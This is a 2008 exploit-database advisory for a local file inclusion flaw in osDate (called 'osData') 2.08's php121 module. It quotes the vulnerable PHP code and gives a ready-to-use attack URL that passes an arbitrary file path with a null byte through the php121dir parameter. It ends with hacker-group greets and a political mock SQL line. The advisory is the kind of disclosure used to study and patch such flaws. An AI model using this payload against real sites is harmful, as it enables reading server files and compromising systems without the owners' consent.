[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : osData <= 2.08 Modules Php121 Local File Inclusion Vulnerability
# Published : 2008-01-09
# Author : Cold Zero
# Previous Title : Evilsentinel <= 1.0.9 (multiple vulnerabilities) Disable Exploit
# Next Title : UploadImage/UploadScript 1.0 Remote Change Admin Password Exploit
=========================================================================
osData <= 2.08 Modules Php121 Local File Include Vulnerability
=========================================================================
Found by :
Cold z3ro , http://www.Hackteach.org/cc/
=========================================================================
Download :
http://gscripts.net/free-php-scripts/Dating_Scripts/osDate/details.html
=========================================================================
Bug :
if (file_exists($php121dir . "php121config.php")) { <= line 34
require_once($php121dir . "php121config.php");
} else {
die ("PHP121 configuration file does not exist!");
}
=========================================================================
About :
osData is php dating script fully integrates with major bulletin boards
(phpBB, vBulletin ) and FlashChat and provides several payment modules,
multiple skins, and free upgrade .
=========================================================================
Usage :
http://host/osData/php121/php121db.php?php121dir=[ File ]%00
=========================================================================
Greets :
Hack Teach Masters And Members , Xp10 Masters
=========================================================================
Plestine Hackers SQl Command :
0 update palestine set palestine = 'Long live My Homeland';
=========================================================================
# www.Syue.com [2008-01-09]